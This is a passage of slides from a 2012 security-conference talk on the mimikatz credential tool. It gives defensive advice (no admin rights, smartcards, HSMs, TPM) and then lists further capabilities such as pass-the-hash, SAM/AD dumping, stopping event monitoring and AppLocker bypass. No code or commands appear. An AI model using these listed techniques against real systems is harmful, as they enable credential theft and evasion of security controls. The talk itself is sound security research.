Exactly the same as for sekurlsa, it will prevent access to accounts / computer ! no admin, no admin, no admin… Basics Use smartcards/token for users certificates Use Hardware Security Modules (HSM), even SoftHSM More in depth See what Microsoft can do with TPM from Windows 8 Virtual SmartCard seems promising Verify vendors implementation (Lenovo, Dell, …) of TPM CSP/KSP Their biometrics stuff was a little buggy ;) 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
55
mimikatz what else can it do ?
Play with minesweeper Manipulate some handles Pass the hash Dump SAM / AD Stop event monitoring Patch Terminal Server Basic GPO bypass Applocker / SRP bypass Driver Play with tokens & privileges Display SSDT x86 & x64 List minifilters actions List Notifications (process / thread / image / registry) List Objects hooks and procedures … 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
56
mimikatz that’s all folks !
Thanks’ to / Merci à : my girlfriend for her support (her LSASS crashed few times) Application Security Forum to offer me this great opportunity Partners and Sponsors for sure ! Microsoft to always consider it as normal/acceptable Security friends/community for their ideas & challenges nagual, newsoft, mubix, … You, for your attention ! Questions ? Don’t be shy ;) especially if you have written the corresponding slide number 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
57
Blog, Source Code & Contact
mimikatz source 07/11/2012 Benjamin DELPY ASFWS ; blog.gentilkiwi.com
Similar presentations
